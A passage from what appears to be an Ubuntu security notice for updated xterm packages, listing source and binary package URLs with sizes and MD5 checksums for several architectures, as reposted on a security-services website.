      Size/MD5:   469724 70acad02e39d60d79eb8fd80a55da27a

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu1.1_i386.deb
      Size/MD5:   453344 2a5d12cc01fa456f4bd205da497a1589

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/x/xterm/xterm_229-1ubuntu1.1_lpia.deb
      Size/MD5:   454232 8db8034c6e77acaa900675e948b28a52

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/x/xterm/xterm_229-1ubuntu1.1_powerpc.deb
      Size/MD5:   467854 9cde83be48898ed57edd5222300b82c7

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/x/xterm/xterm_229-1ubuntu1.1_sparc.deb
      Size/MD5:   463836 af8e50a43f685499861d80a269db29f0

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_235-1ubuntu1.1.diff.gz
      Size/MD5:    64123 4ded8fda6ea425540c351325ea456ee7
    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_235-1ubuntu1.1.dsc
      Size/MD5:     1502 3119b97098961157134b965cd67e72df
    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_235.orig.tar.gz
      Size/MD5:   857714 5060cab9cef0ea09a24928f3c7fbde2b

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_235-1ubuntu1.1_amd64.deb
      Size/MD5:   486760 8fccb232d9da5308a6439eff39d01b23

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_235-1ubuntu1.1_i386.deb
      Size/MD5:   470726 39fbdb1ec355002760cfe3348b53eec9

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/x/xterm/xterm_235-1ubuntu1.1_lpia.deb
      Size/MD5:   471960 47e2adb407b0d99c6dc6fea4af228cf7

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/x/xterm/xterm_235-1ubuntu1.1_powerpc.deb
      Size/MD5:   484530 a6d968aa8aa52625d0b8cdb30fbc94ea

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/x/xterm/xterm_235-1ubuntu1.1_sparc.deb
      Size/MD5:   481590 9121f8d82c0e7a334d796c1dff96aa74

New User Registration
Email:
UserID:
Passwd:
Please email me your monthly newsletters, informing the latest services, improvements & surveys.
Please email me a vulnerability test announcement whenever a new test is added.
   Privacy
Registered User Login
 
UserID:   
Passwd:  

 Forgot userid or passwd?
Email/Userid:




Home | About Us | Contact Us | Partner Programs | Privacy | Mailing Lists | Abuse
Security Audits | Managed DNS | Network Monitoring | Site Analyzer | Internet Research Reports
Web Probe | Whois

© 1998-2014 E-Soft Inc. All rights reserved.